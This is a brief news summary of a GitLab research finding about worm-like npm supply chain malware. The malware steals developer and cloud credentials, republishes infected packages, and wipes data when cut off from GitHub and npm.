Dead Man’s Switch – Widespread npm Supply Chain Attack Driving Malware Attacks
GitLab’s Vulnerability Research team has uncovered a large-scale supply chain attack spreading a destructive malware variant through the npm ecosystem.
Once running, the malware aggressively harvests credentials from multiple sources, including GitHub tokens, npm authentication keys, and accounts for AWS, Google Cloud, and Microsoft Azure.
Using stolen npm tokens, the malware automatically infects all other packages maintained by the victim. It modifies the package.json files to include malicious scripts, increments version numbers, and republishes everything to npm. This worm-like behavior means the attack spreads exponentially across the ecosystem.
Most critically, the malware includes a destructive payload designed to protect the attack’s infrastructure. If an infected system simultaneously loses access to both GitHub and npm, it triggers immediate data destruction. On Windows systems, the malware attempts to delete all user files and overwrite disk sectors. On Linux and Mac systems, it uses advanced wiping techniques to make file recovery impossible.